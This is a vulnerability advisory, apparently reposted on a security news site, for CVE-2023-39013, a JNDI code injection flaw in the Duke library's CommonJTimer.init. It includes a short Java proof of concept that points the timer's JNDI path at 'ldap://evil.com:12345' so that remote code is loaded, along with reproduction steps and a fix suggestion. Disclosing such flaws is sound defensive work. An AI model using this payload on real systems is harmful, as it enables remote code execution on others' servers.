Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39013: There's a code injection vulnerability of `no.priv.garshol.duke.server.CommonJTimer.init` · Issue #273 · larsga/Duke

Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.

CVE
#vulnerability#ldap

Affected Version
The latest version 1.2 and below.

Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:

CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);

To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.

Related news

GHSA-p83q-99rc-vfmv: Code injection in Duke

Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907